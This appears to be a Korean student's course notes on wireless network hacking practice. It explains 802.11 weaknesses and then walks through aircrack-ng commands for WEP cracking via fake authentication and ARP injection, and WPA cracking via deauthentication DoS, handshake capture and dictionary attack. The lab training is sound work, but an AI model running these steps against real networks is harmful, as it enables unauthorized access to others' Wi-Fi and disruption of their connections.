본문으로 바로가기
336x280(권장), 300x250(권장), 250x250, 200x200 크기의 광고 코드만 넣을 수 있습니다.

3. 무선 네트워크 해킹 실습


1) 802.11 Weakness


▣ Rogue AP

- 도둑 AP

- 내부 네트워크에 불법으로 연결된 AP

- 외부에서 내부로 침투 가능한 위험한 AP


▣ Ad-Hoc

- 내부 네트워크에 연결되어있는 상태(랜선연결)에서 Ad-Hoc을 켜면 내부 네트워크에 침투가 가능함.

- 내부 네트워크에 연결되어있지 않은 상태의 Ad-Hoc은 상관없음.


▣ Phising AP

- 허가된 AP가 아니면서 AP인척을 하여 나에게 Station이 붙게하여 개인정보를 캐냄.

- ST가 붙게 하는 법

☞ 그냥..(붙을법한 SSID로 설정)

☞ 신호 세기 (강할수록 붙을 확률이 높음)

☞ Probe 이용 (한번 붙었던 AP에 대하여 똑같은 정보로 만들어서 붙게 유도가능)


▣ WEP/WPA Crack

- 와이파이 비밀번호 암호화 방식인 WEP/WPA를 크랙하여 비밀번호를 얻을 수 있음.


▣ MAC Spoof

- MAC Spoof는 MAC 필터링을 우회하기 위해씀.

- AP가 필터링하고 있는 MAC 주소를 알기위해 이미 AP에 붙어있는 ST의 MAC 주소를 알아내야함.


▣ Mis-Config AP

- 관리자가 실수로 만든 AP

- 다른 의미로 하면 로그 AP임.


▣ DoS



2) Scanning


[칼리 리눅스]

▣ 무선 네트워크 확인

- 명령어 : # iwconfig

- Wlan Mode

☞ managed : ST의 역할

monitor : 스캐닝, 해킹, AP 생성, 데이터 수집

☞ master : AP 생성

- 모니터 모드로 바꾸기

# airmon-ng start [무선인터페이스]

☞ iwconfig로 보면 mon0 인터페이스가 생성됨.

☞ 필자는 기존 wlan0가 wlan0mon이 됨.

- Scanning하기

# airodump-ng mon0

3) WEP Crack


▣ WEP Crack 방법

- 기존 WEP

☞ IV(Initial Vertor, 랜덤값)와 key를 이용하여 RC4 알고리즘에 돌리면 패킷이 암호화가 됨.


- Crack 원리

☞ RC4 알고리즘은 이미 깨져있는 알고리즘이라서 복호화가 가능함.

☞ IV와 암호화된 패킷이 존재한다면 key값을 알아낼 수 있음.

☞ 이 때, IV를 알아내는 것이 관건임! IV 는 랜덤값.

☞ IV는 25,000~30,000 만개의 패킷의 간격으로 드물게 재사용이 됨!! == 약 3만개의 패킷을 모으면 크랙이 가능!!


▣ WEP Crack


1. 무선랜 카드를 모니터링 모드로 전환.

# airmon-ng start [무선인터페이스]


2. 스캐닝 후 타겟을 정함.

# airodump-ng [무선인터페이스(monitor모드)] 


3. 무선 데이터를 수집.

# airodump -c [채널] --bssid [AP MAC주소] -w [filename] [무선인터페이스(monitor모드)]


4. Data 유발을 위해 가인증을 함.

# aireplay-ng -1 5000 -e [ssid] -a [ap mac] -h [가짜 st mac] [무선인터페이스(monitor모드)]

☞ WEP : Open System 이라서 비밀번호 없이 붙을 수 있음.
☞-1 : 가 인증

☞ 5000 : 5초에 1번씩 보냄

☞ ap mac == bssid

☞ 가짜 st mac : 존재하지 않는 mac 주소


5. ARP Injection 공격으로 Data를 더 빠르게 강제 유발.

# aireplay-ng-3 -b [ap mac] -h [st mac] [무선인터페이스(monitor모드)]

☞ ARP Request 패킷과 ACK 패킷을 대량 전송.

☞ -3 : ARP Injection

----> 패킷이 약 3만개정도 모이면 창을 모두 종료함.


6. 패킷이 충분하게 덤프된 상태에서 WEP key를 크랙.

# aircrack-ng [file name]



4) WPA Crack


▣ WPA Crack

- WPA/WPA2 모두 같은 방법으로 사전파일 대입공격으로 크랙가능함.

- 4-way Handshake를 캡처하여 key 추출 가능.    

- 해당 패킷 속 비밀번호를 주고받으며 확인을 하고 있기 때문에 해당 패킷을 캡처하면 됨.

- 이미 station이 AP에 붙어있다면 DoS 공격으로 연결을 끊고 다시 station이 probe 통해 재 연결할테니 그 때 캡처하면 됨!



1. 무선랜 카드를 모니터링 모드로 전환.

# airmon-ng start [무선인터페이스] 


2. 스캐닝 후 타겟을 정함.

# airodump-ng [무선인터페이스(monitor모드)] 


3. 무선 데이터를 수집.

# airodump -c [채널] --bssid [AP MAC주소] -w [file name] [무선인터페이스(monitor모드)]


4. WPA Handshake를 캡쳐하기 위해 DoS 공격을 수행함.

# aireplay-ng -0 [공격횟수] -a [ap mac] -c [client mac] [무선인터페이스(monitor모드)]

☞ -0 : DoS

☞ 공격횟수 : 5번이면 충분


☞ WPA handshake가 뜨면 패킷을 캡처했다는 뜻으로 종료하면 됨.


5. 사전파일을 이용하여 key를 크랙함.

--> 사전파일에 없으면 못찾아줌...

# aircrack-ng -b [ap mac] -w [사전파일명] [file name] 







i2sec 대구지점 23기 수료생.